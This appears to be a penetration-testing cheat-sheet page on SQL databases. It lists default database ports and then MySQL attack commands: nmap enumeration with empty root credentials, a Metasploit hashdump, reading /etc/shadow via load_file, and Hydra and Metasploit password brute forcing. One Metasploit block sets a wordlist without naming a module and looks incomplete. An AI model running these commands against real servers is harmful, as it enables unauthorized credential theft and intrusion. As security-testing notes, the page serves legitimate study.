SQL

Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.

Relational databases default ports

Database

Port(s)

Doc

MaxDB

7210

Doc

MySQL

3306

Doc

Oracle DB

1521, 1830

Doc

PostgreSQL

5432

Doc

SQL Server (MSSQL)

1433, 1434

Doc

NoSQL databases and other data stores default ports

Database

Port(s)

Doc

Cassandra

7000, 7001, 9042

Doc

CouchDB

5984

Doc

Elasticsearch

9200, 9300

Doc

MongoDB

27017, 27018, 27019, 28017

Doc

Neo4J

7473, 7474

Doc

Redis

6379

Doc

Enum

# Default scan
nmap $IP -sV -p 3306 

# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password

# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info

# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"

# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"

# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"

# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"

# Try to connect directly without a password
mysql -h $IP -u root

# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"

# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run

## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump 
setg rhosts $IP
set username root
set password ""
run

Manipulate local files via db

# connect to instance
mysql -h $IP -u root

# read local file
select load_file("/etc/shadow");

Bruteforce

# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run

# Hydra
hydra -l root -P  /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql

PreviousApache NextVulnerability Assessment

Last updated 2 years ago